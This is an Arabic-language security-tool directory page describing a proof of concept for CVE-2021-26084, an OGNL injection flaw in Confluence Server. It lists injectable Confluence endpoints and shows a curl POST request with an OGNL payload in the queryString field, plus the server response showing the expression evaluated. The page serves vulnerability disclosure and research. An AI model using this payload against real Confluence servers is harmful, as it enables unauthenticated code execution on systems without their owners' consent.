Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-26084_PoC — استغلال إثبات المفهوم لثغرة CVE-2021-26084، وهي ثغرة حقن OGNL في Confluence Server وData Center، تعرض تنفيذًا عن بُعد للتعليمات البرمجية دون مصادقة. | Kitploit
أدوات/GitHubGitHub/alt3kx/cve-2021-26084_poc
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

استغلال إثبات المفهوم لثغرة CVE-2021-26084، وهي ثغرة حقن OGNL في Confluence Server وData Center، تعرض تنفيذًا عن بُعد للتعليمات البرمجية دون مصادقة.

عرض المستودع
531648منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-26084 (PoC) | حقن OGNL في Confluence Server Webwork

توجد ثغرة حقن OGNL تسمح لمستخدم مصادق عليه، وفي بعض الحالات لمستخدم غير مصادق، بتنفيذ كود عشوائي على خادم Confluence أو مثيل Data Center.

poc

معركتي لتحديد نقاط الدخول والحقن XD

Fight (1)Fight (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium
2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

أخيرًا، تم استغلال نقاط الدخول في Confluence

root@kitploit:~
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

فحصي اليدوي الأول: ملاحظة: مستخدم قبل المصادقة

root@kitploit:~
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

استجابة الخادم:

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

المراجع:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

مقالة رائعة منشورة هنا:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

بعض التلميحات المفيدة جدًا من:
@wvuuuuuuuuuuuuu
@iamnoooob

المؤلف

Alex Hernandez الشهير بـ (@_alt3kx_)

تنزيل الأداة